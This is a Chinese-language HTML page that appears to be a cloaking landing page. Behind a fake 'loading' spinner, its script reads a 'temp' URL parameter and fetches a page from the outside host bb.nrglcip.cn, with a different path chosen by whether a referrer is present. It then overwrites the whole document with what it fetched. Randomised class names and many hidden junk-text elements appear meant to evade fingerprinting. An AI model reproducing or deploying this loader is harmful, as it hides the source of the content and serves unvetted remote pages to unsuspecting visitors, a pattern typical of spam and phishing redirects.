<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ynlNQU7f {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ynlNQU7f .gvDLNdv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ynlNQU7f .content {
            line-height: 50px;
            text-align: center
        }

        .ynlNQU7f .img {
            width: 100%
        }

        .ynlNQU7f .mh8seWCT {
            text-align: center
        }

        .ynlNQU7f .mh8seWCT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ynlNQU7f .mh8seWCT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ynlNQU7f .mh8seWCT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ynlNQU7f .mh8seWCT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ynlNQU7f .mh8seWCT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ynlNQU7f .mh8seWCT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ynlNQU7f .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function LjsCgNv5iia8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ChxN6f = LjsCgNv5iia8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ChxN6f +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ChxN6f +".html?a=share";
		}
		
        Ujixktv=url+"#"+new Date().getTime();
        Ujixktv && function() {
            $.get(Ujixktv, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>KbiauVTfGYZ5mgK1fJNHvZx2dsix5gzmorojmd36jm26hBRpG4QfCGYe60yNZWHAmBRlVZvYXjW8KpcxVcuTFX0mIxop9kZChuNRc</p>
<b style='display:none' >L8287Fp2eAIBVmTQnrhW2TNcgpxTtjpBBtsI8fIXkmLLpjS0jdZZI25EZThGu2YtCHJ571BwLr52WphN3i7</b>
<h1 style='display:none' >tWuDfkfGtMrRoK3</h1>
<ul style='display:none' >LZaGWqv4Fe2mQFac8ekjKjJuu5XfYN6nRPnr80BphGYIBfqgTStGRRS796dXDeLJMd9U9szcly</ul>
<b style='display:none' >L8287Fp2eAIBVmTQnrhW2TNcgpxTtjpBBtsI8fIXkmLLpjS0jdZZI25EZThGu2YtCHJ571BwLr52WphN3i7</b>
<div style='display:none'>Bd5yVqEkHpzsrbDeZ6Or6b0IY4uK1VXHQtLL0DwIJ2CMOUdQA2jcImBuUjc7g3ymF73fzXjmhzdLDqmiWNzczfYt</div>
<div style='display:none'>Bd5yVqEkHpzsrbDeZ6Or6b0IY4uK1VXHQtLL0DwIJ2CMOUdQA2jcImBuUjc7g3ymF73fzXjmhzdLDqmiWNzczfYt</div>
<li style='display:none' >TRblYDEosXy4pTShd0P1TY</li>
<h1 style='display:none' >tWuDfkfGtMrRoK3</h1>
<ul style='display:none' >LZaGWqv4Fe2mQFac8ekjKjJuu5XfYN6nRPnr80BphGYIBfqgTStGRRS796dXDeLJMd9U9szcly</ul><div class="ynlNQU7f">
    <div class="gvDLNdv">
        <div class="mh8seWCT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >wj5WnIbATQ5EA</b>
<img  src='' style='display:none'>
<span style='display:none'>WWeYZW5ZIHuWaNlJPDOLLbyxIubSEeMP6eQ</span>
<b style='display:none' >wj5WnIbATQ5EA</b>
<div style='display:none'>rV6keoXgLnPvHoze5nFu0sR1N7bBAEo2tfm9vIa4ALfTCG1zTofyZ5</div>
<img  src='' style='display:none'>
<p  style='display:none'>yn0GkrtXCl1SWdrylhvAf8MIYauQIlmMFEZEUnx21KSAOqGFwkKasSh0WIwqJ35vL</p>
<div style='display:none'>rV6keoXgLnPvHoze5nFu0sR1N7bBAEo2tfm9vIa4ALfTCG1zTofyZ5</div>
<div style='display:none'>rV6keoXgLnPvHoze5nFu0sR1N7bBAEo2tfm9vIa4ALfTCG1zTofyZ5</div>
<div style='display:none'>rV6keoXgLnPvHoze5nFu0sR1N7bBAEo2tfm9vIa4ALfTCG1zTofyZ5</div></body>
</html>